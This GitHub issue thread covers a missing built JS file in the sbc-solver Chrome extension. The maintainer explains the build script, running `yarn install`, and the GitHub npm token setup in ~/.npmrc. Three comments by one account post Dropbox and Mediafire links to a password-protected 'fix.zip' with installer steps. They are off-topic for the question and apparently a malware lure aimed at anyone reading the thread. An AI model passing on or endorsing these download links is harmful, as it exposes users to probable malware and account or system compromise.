### ISSUE TITLE
Can't find "react_app/static/js/main.f4114b81.js"

### ISSUE THREAD

**Issue by moudimash99** [kosciukiewicz/sbc-solver#2]
Hello I was looking over your code, which is absolutely amazing btw, and I was trying to run it myself. I must say this is not an issue per-say but a question on running it
In the manifest for the chrome extension, it requires a js file main from react that I'm unsure where it should be located from. 
How would one solve this issue or run the app?

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kosciukiewicz** [comment]
Sure, If You want to make some changes in the app, You should use the `./scripts/build_extension.sh`.

The reason for that is that every built js file contains individual hash part. The provided scripts handles all the changes and replace the proper names in the manifest file. Feel free to  ask if You have any more issues.

**Comment by vm10ks** [comment]
> Sure, If You want to make some changes in the app You should use the `./scripts/build_extension.sh` to build an extension.
> 
> The reason for that is that every built js file contains individual hash part. The provided scripts handles all the changes and replace the proper names in the manifest file. Feel free to ask if You have any more issues.

hi there i was trying to build it with multiple approaches since that sh file doesnt work, i tried to install yarn in the directory of it said unable to do so because we dont have auth access to ti , even when i tried to load it into chrome it didnt work same error  as the guy mentioned up here

**Comment by kosciukiewicz** [comment]
Should be resolved now:

1. I attached the `ea_sbc_solver_engine` npm package to the `sbc-solver` repository and made it public;
2. Added repo `.npmrc` config file;
3. Updated README;

I tested building the app on freshly cloned repo on different github credentials - should be fine now.

Remember that to access the github npm registry the credentials in `.npmrc` are needed. I set up my credentials in user level file `~/.npmrc` (You can generate the personal access token in your github profile developer settings):

```
//npm.pkg.github.com/:_authToken={YOU_PERSONAL_ACCESS_TOKEN}
@NAMESPACE:registry=https://npm.pkg.github.com/
```

**Comment by vm10ks** [comment]
> Should be resolved now:
> 
> 1. I attached the `ea_sbc_solver_engine` npm package to the `sbc-solver` repository and made it public;
> 2. Added repo `.npmrc` config file;
> 3. Updated README;
> 
> I tested building the app on freshly cloned repo on different github credentials - should be fine now.
> 
> Remember that to access the github npm registry the credentials in `.npmrc` are needed. I set up my credentials in user level file `~/.npmrc` (You can generate the personal access token in your github profile developer settings):
> 
> ```
> //npm.pkg.github.com/:_authToken={YOU_PERSONAL_ACCESS_TOKEN}
> @NAMESPACE:registry=https://npm.pkg.github.com/
> ```

build sh file logs : $ ./scripts/build_extension.sh
Cleaning before build... Done
Building react app... warning ..\..\..\package.json: No license field
'react-scripts' is not recognized as an internal or external command,
operable program or batch file.
error Command failed with exit code 1.
Done
Copying build react app contents... cp: cannot stat './build/*': No such file or directory
Done
Injecting static files to chrome extension... find: ‘./chrome_extension/react_app/static/js’: No such file or directory
basename: missing operand
Try 'basename --help' for more information.
find: ‘./chrome_extension/react_app/static/css’: No such file or directory
basename: missing operand
Try 'basename --help' for more information.
find: ‘./chrome_extension/react_app/static/js’: No such file or directory
basename: missing operand
Try 'basename --help' for more information.
find: ‘./chrome_extension/react_app/static/media’: No such file or directory
basename: missing operand
Try 'basename --help' for more information.
Done
and google chrome load unpacked log  : Failed to load extension
File
~\Desktop\sbc-solver-master (2)\chrome_extension
Error
Could not load javascript 'react_app/static/js/main.f4114b81.js' for script.
Could not load manifest.

**Comment by kosciukiewicz** [comment]
Based on:

`'react-scripts' is not recognized as an internal or external command`

You should probably run `yarn install` to install all required packages. If you filled the token correctly, all packages, `optimization_sbc_solver_engine` included, should be installed smoothly.

**Comment by gokhanfehimoglu** [comment]
I am unable to pass the error 

`https://npm.pkg.github.com/download/@kosciukiewicz/ea_sbc_solver_engine/0.3.0/bd856e0350aebf727f825da6d4b3389ca5c445ff: Request failed "401 Unauthorized"`

Any help is appreciated

**Comment by kosciukiewicz** [comment]
The @kosciukiewicz/ea_sbc_solver_engine npm package is available publicly and connected to this repository. To access github npm registry ensure that credentials are set up in ~/.npmrc and generated access token (classic) has proper permissions (read:packages):

```
//npm.pkg.github.com/:_authToken={YOUR_PERSONAL_ACCESS_TOKEN}
@NAMESPACE:registry=https://npm.pkg.github.com/
```

**Comment by gokhanfehimoglu** [comment]
My bad. I was providing the token as `//npm.pkg.github.com/:_authToken={ghp_XXX}` with curly braces included. Removing the curly braces made it work. Thanks for quick answer.
